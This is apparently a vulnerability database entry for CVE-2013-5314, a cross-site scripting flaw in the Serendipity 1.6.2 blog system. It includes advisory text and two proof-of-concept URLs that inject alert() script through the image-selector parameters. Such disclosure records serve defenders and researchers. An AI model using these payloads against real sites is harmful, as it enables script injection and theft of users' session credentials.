Serendipity serendipity_admin_image_selector.php Script Cross-Site Scripting Vulnerability

Vulnerability ID: 1121756 Vulnerability type: Cross-site scripting
Published: 2013-07-12 Updated: 2013-08-20
CVE ID: CVE-2013-5314 CNNVD-ID: CNNVD-201308-284
Platform: PHP CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/38642
https://www.securityfocus.com/bid/61138
https://cxsecurity.com/issue/WLB-2013070093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-284
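|Vulnerability details
Serendipity is a PHP-based blog system developed by the Serendipity team. It supports creating online diaries, blogs, web pages and more. A cross-site scripting vulnerability exists in the serendipity_admin_image_selector.php script in Serendipity 1.6.2 and earlier. A remote attacker can exploit it by sending the 'serendipity[htmltarget]' parameter to inject arbitrary web script or HTML.
|Vulnerability exploit (EXP)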
source: http://www.securityfocus.com/bid/61138/info

Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Serendipity 1.6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117

http://www.example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
|Affected products
Serendipity Serendipity 1.6.2
|References

Source: www.mavitunasecurity.com
Link: https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity
Source: BUGTRAQ
Name: 20130719 Re: [Full-disclosure] XSS Vulnerabilities in Serendipity
Link: http://archives.neohapsis.com/archives/bugtraq/2013-07/0135.html